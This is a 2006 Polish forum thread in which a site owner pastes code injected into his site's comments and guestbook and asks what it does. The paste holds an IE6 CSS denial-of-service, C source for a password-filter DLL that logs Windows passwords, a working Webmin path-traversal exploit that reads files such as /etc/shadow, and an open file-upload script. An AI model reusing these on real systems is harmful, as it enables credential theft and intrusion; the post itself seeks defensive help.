Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> HACKERZY? HACK mojej strony !, HELP :(:(
mThW
post
Post #1





Grupa: Zarejestrowani
Postów: 18
Pomógł: 0
Dołączył: 19.07.2006

Ostrzeżenie: (0%)
-----

Witam (IMG:http://forum.php.pl/style_emoticons/default/exclamation.gif) !

Robie strone konkurencyjna dla mojego miasta i jest pare osob zainteresowanych nia!
Ktos proboje cos zrobic, zostaja wklejane kody php na moja strone!!
Oto jeden kod wklejony w systemie newsow w komentarzach:

[PHP] pobierz, plaintext 
  1. <!-- 
  2. # Internet Explorer <= 6 DoS vulnerability 
  4. # tested IE6 on XPx64 and IE 5.1, 5.5 and 6 on XP SP2 (eng) 
  5. # all versions are vulnerable 
  6. # ie 7 (beta 2 and 3) are not affected 
  8. # this malicious css code freezes/ dos the internet explorer 
  9. # prior version 7 and stops any user interaction 
  10. # the absolute size of the div element does not matter but has 
  11. # to be higher than the input's one 
  13. # 07/14/2006 by jonasschaub at gmail.com 
  14. # <a href="http://jonas.elunic.de/blog/index.php/2006/07/14/ie-freeze-bug/" target="_blank">http://jonas.elunic.de/blog/index.php/2006.../ie-freeze-bug/</a> 
  16. --> 
  17.  
  18. <style type="text/css"> 
  19.  
  20. input 
  22. width:35px; 
  23. float:left; 
  25.  
  26. </style> 
  27.  
  28. <div style="width:50px;"> 
  29. <span> 
  30. <span style="position:relative;"> 
  31. <input /> 
  32. </span> 
  33. <input /> 
  34. <input /> 
  35. </span> 
  36. </div>
  37.  
  38.  
  39. #include <windows.h> 
  40. #include <stdio.h> 
  41. #include <stdlib.h> 
  42.  
  43. struct UNI_STRING { 
  44. USHORT len; 
  45. USHORT maxlen; 
  46. WCHAR *buff; 
  47. }; 
  48.  
  49. static HANDLE fh; 
  50.  
  51. BOOLEAN __stdcall InitializeChangeNotify () 
  53. DWORD wrote; 
  54. fh = CreateFile("C:temppwdchange.out", 
  55. GENERIC_WRITE, 
  56. FILE_SHARE_READ|FILE_SHARE_WRITE, 
  57. 0, 
  58. CREATE_ALWAYS, 
  59. FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUG 
  60. H, 
  61. 0); 
  62. WriteFile(fh, "InitializeChangeNotify startedn", 31, &wrote, 0); 
  63. return TRUE; 
  65.  
  66. LONG __stdcall PasswordChangeNotify ( 
  67. struct UNI_STRING *user, 
  68. ULONG rid, 
  69. struct UNI_STRING *passwd 
  72. DWORD wrote; 
  73. WCHAR wbuf[200]; 
  74. char buf[512]; 
  75. char buf1[200]; 
  76. DWORD len; 
  77.  
  78. memcpy(wbuf, user->buff, user->len); 
  79. len = user->len/sizeof(WCHAR); 
  80. wbuf[len] = 0; 
  81. wcstombs(buf1, wbuf, 199); 
  82. sprintf(buf, "User = %s : ", buf1); 
  83. WriteFile(fh, buf, strlen(buf), &wrote, 0); 
  84.  
  85. memcpy(wbuf, passwd->buff, passwd->len); 
  86. len = passwd->len/sizeof(WCHAR); 
  87. wbuf[len] = 0; 
  88. wcstombs(buf1, wbuf, 199); 
  89. sprintf(buf, "Password = %s : ", buf1); 
  90. WriteFile(fh, buf, strlen(buf), &wrote, 0); 
  91.  
  92. sprintf(buf, "RID = %xn", rid); 
  93. WriteFile(fh, buf, strlen(buf), &wrote, 0); 
  94.  
  95. return 0L; 
  97. -----------------------end of 
  98. FPNWCLNT.c---------------------------------- 
  99. --
  100.  
  101.  
  102.  
  103. <?php 
  104. /* 
  105. Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability 
  106. Date : 2006-06-30 
  107. Patch : update to version 1.290 
  108. Advisory : <a href="http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html" target="_blank">http://securitydot.net/vuln/exploits/vulne...17885/vuln.html</a> 
  109. Coded by joffer , <a href="http://securitydot.net" target="_blank">http://securitydot.net</a> 
  110. */ 
  111.  
  112. $host = $argv[1]; 
  113. $port = $argv[2]; 
  114. $http = $argv[3]; 
  115. $file = $argv[4]; 
  116. // CHECKING THE INPUT 
  117. if($host != "" && $port != "" && $http != "" && $file != "") { 
  118.  
  119.  
  120. $z = "/..%01"; 
  121. for ($i=0;$i<60;$i++) { 
  122. $z.="/..%01"; 
  123. } 
  124.  
  125. $target = $http."://".$host.":".$port."/unauthenticated".$z."/".$file.""; 
  126.  
  127. echo "Attacking ".$host."n"; 
  128. echo "---------------------------------n"; 
  129.  
  130. // INITIALIZING CURL SESSION TO THE TARGET 
  131.  
  132. $ch = curl_init(); 
  133.  
  134. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); 
  135. curl_setopt($ch, CURLOPT_URL, $target); 
  136. curl_setopt ($ch, CURLOPT_TIMEOUT, '10'); 
  137. curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE 
  138. ); 
  139.  
  140. $content = curl_exec($ch); 
  141. curl_close ($ch); 
  142.  
  143. // CLOSING CURL 
  144.  
  145. // ECHOING THE CONTENT OF THE $FILE 
  146. echo $content; 
  147.  
  148. echo "---------------------------------n"; 
  149. echo "Coded by joffer , <a href="http://securitydot.netn";;" target="_blank">http://securitydot.netn";;</a> 
  150.  
  151. } else { 
  152. // IF INPUT IS NOT CORRECT DISPLAY THE README 
  153. echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILEn"; 
  154. echo "Example : php webmin.php localhost 10000 http /etc/shadown"; 
  155. echo "Coded by joffer , <a href="http://securitydot.netn";;" target="_blank">http://securitydot.netn";;</a> 
  156. } 
  157.  
  158. ?>
  159.  
  160.  
  161.  
  162. <?php 
  163. $file = $HTTP_POST_FILES["plik"]["tmp_name"]; 
  164. $zapisz_jako = $HTTP_POST_FILES["plik"]["name"]; 
  165.  
  166. if (!copy($file, $zapisz_jako)) { 
  167.  
  168. print ("Kopiowanie pliku nie powiodło się...<br>n"); 
  169.  
  170. } 
  171.  
  172. print "<BR>Nazwa pliku: ".$HTTP_POST_FILES["plik"]["name"]; 
  173.  
  174. print "<BR>Rozmiar pliku: ".$HTTP_POST_FILES["plik"]["size"]; 
  175.  
  176. print "<BR>tymczasowo: ".$HTTP_POST_FILES["plik"]["tmp_name"]; 
  177.  
  178. print "<BR>Typ przesłanego pliku: ".$HTTP_POST_FILES["plik"]["type"]; 
  179.  
  180. ?>
[PHP] pobierz, plaintext



Moaj strona: http://www.miasto-glubczyce.info/index.php...t=&oms=news
Głowna: http://www.miasto-glubczyce.info/
http://www.miasto-glubczyce.info/?oms=ksiega_gosci
W ksiedze tez wpisano jakis kod, dlatego jest error.
HELP (IMG:http://forum.php.pl/style_emoticons/default/biggrin.gif)

Co te skrypty znacza? Nie znam php, mam 3 rozne IP z ktorych zostaly wysylane kody, nie wiem czy jest to cos powaznego i czy zawiadamiac odpowiednich ludzi...


Dzieku z gory za analize.
Pozdrawiam
Go to the top of the page
+Quote Post

Posty w temacie
- mThW   HACKERZY? HACK mojej strony !   24.07.2006, 22:28:06
- - piczu   pierwszy to DoS na IE, drugi to trojan na wykrycie...   24.07.2006, 22:52:27
- - Cysiaczek   Proponuję, żebyś zabezpieczył swoje formularze tak...   24.07.2006, 23:05:40
- - marek220   Proszę tylko nie crackerzy, to już się przyjeło dl...   25.07.2006, 11:48:31

« Następny starszy · PHP · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 22.08.2025 - 14:45
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn